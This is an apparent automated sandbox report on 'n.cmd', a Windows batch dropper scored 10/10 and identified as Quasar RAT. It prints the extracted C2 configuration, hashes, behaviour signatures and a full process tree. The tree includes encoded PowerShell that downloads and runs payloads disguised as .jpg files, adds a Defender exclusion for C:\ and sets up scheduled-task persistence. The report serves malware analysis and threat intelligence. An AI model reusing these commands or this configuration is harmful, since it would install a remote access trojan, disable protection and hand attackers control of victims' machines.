Overview

overview

10

Static

static

1

n.cmd

windows10-ltsc 2021-x64

Resubmissions

01-01-2025 14:23

250101-rp54yaxqhw 10

Analysis

  • max time kernel
    106s
  • max time network
    108s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-01-2025 14:23

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    n.cmd

  • Size

    1KB

  • MD5

    fa75e849a3beb187d543d9b4ae894dcc

  • SHA1

    41b1a755057677bfa617c089ba6092733155a1f0

  • SHA256

    ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d

  • SHA512

    eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f

Score
10/10
quasarafafafexecutionspywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.imghippo.com/files/CFqi5277Mc.jpg

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://i.imghippo.com/files/mcm7321uo.jpg

Extracted

Family

quasar

Version

1.4.1

Botnet

afafaf

C2

194.26.192.167:2768

Mutex

c1060262-cacc-4b5e-8e09-ac72d84cef52

Attributes
  • encryption_key

    BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055

  • install_name

    OneDrive.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    OneDrive

  • subdirectory

    OneDrive

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Start PowerShell.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -w h -command ""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3160
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAEMARgBxAGkANQAyADcANwBNAGMALgBqAHAAZwAiADsAJABwAGEAdABoAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE8AbgBlAEQAcgBpAHYAZQAiADsAbQBrAGQAaQByACAAJABwAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsAaQB3AHIAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABUAGUAeAB0ACgAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAiACQAcABhAHQAaABcAGIAdQBkAGQAeQAuAGoAcABnACIAIAAtAFIAYQB3ACkAKQApACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiAA0ACgA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.cmd" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1196
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3524
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAG0AYwBtADcAMwAyADEAdQBvAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAYgA2ADQARgBpAGwAZQA9ACIAJABwAGEAdABoAFwAZgBpAGwAZQAuAGoAcABnACIAOwAkAGUAeABlAEYAaQBsAGUAPQAiACQAcABhAHQAaABcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAOwBpAHcAcgAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1664
              • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
                "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1784
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe" /rl HIGHEST /f
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1760
                • C:\Windows\System32\shutdown.exe
                  "C:\Windows\System32\shutdown.exe" /s /t 0
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4424
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3820
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1580
    • C:\Windows\System32\xxpvfx.exe
      "C:\Windows\System32\xxpvfx.exe"
      1⤵
        PID:2764
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x4 /state0:0xa39da055 /state1:0x41c64e6d
        1⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:4848

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        e30544e6d048b2c1c6129c89835c16dd

        SHA1

        21d167ff64825d3f8a5c351c3160b670dc14cb60

        SHA256

        df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

        SHA512

        fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        d8b9a260789a22d72263ef3bb119108c

        SHA1

        376a9bd48726f422679f2cd65003442c0b6f6dd5

        SHA256

        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

        SHA512

        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        446dd1cf97eaba21cf14d03aebc79f27

        SHA1

        36e4cc7367e0c7b40f4a8ace272941ea46373799

        SHA256

        a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

        SHA512

        a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        52ef45a3a79c0deaa28d3d63db7ef863

        SHA1

        cab40efdc2c58fa5d13eeca6142d1efc876fd572

        SHA256

        2d2a467f29ca550b984bdbf185ab14d98cb235b8e5e51978ef58129dc875219e

        SHA512

        490768abbc757ac45f5e619236d2b94bffe37653f712cdb750d7448d01973d18d54b8d5faacfff10d1026c2af47a2d3c1987a54bda0eda2e490e99a12c3645f6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_01aqwqv4.pxv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.cmd
        Filesize

        847B

        MD5

        715335afe50e72cc5bd2c63805bd2add

        SHA1

        b34f448421570f46b076ae607fc1a01f8b023165

        SHA256

        e085efa731076a2454e9d65b733f53dc59b02fd8f57cb79197ed91deb855b2f3

        SHA512

        701bd7ace74c2fe673670987a3bd6e6686d0fd05bbdc3377bfd4e24d38d837b49f872398d0497888258ec42decb183fb8efd3c6a3dcf2ccc6464842d636d5113

        Download Submit

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        3.1MB

        MD5

        b55e5489b45595fb38bf5bb30b69717b

        SHA1

        7511ee8909e0a0c53625eef4bd6b57250e561391

        SHA256

        4f111d05ddb93bf8e4ec906d2705740790402254ee115982d9e5aae36c3b4ffe

        SHA512

        40a520e89579a298922595428033b7f0ae0b8bd5bd6ead29488cad9707b153998ab88c3d55316045315297d185fefaaba49ef21b392ca216ac220e75220d1ead

        Download Submit

      • memory/1784-144-0x000000001C690000-0x000000001C6CC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/1784-143-0x000000001C630000-0x000000001C642000-memory.dmp

        Filesize

        72KB

        Download

      • memory/1784-140-0x000000001C6D0000-0x000000001C782000-memory.dmp

        Filesize

        712KB

        Download

      • memory/1784-139-0x000000001B460000-0x000000001B4B0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/1784-138-0x00000000005C0000-0x00000000008E4000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/3820-116-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-117-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-114-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-115-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-118-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-108-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-110-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-109-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-120-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3820-119-0x0000021AD1C90000-0x0000021AD1C91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4192-28-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4192-33-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4192-30-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4192-31-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4192-27-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4648-0-0x00007FFE37323000-0x00007FFE37325000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4648-16-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4648-15-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4648-12-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4648-11-0x00007FFE37320000-0x00007FFE37DE2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4648-10-0x000001A89AE80000-0x000001A89AEA2000-memory.dmp

        Filesize

        136KB

        Download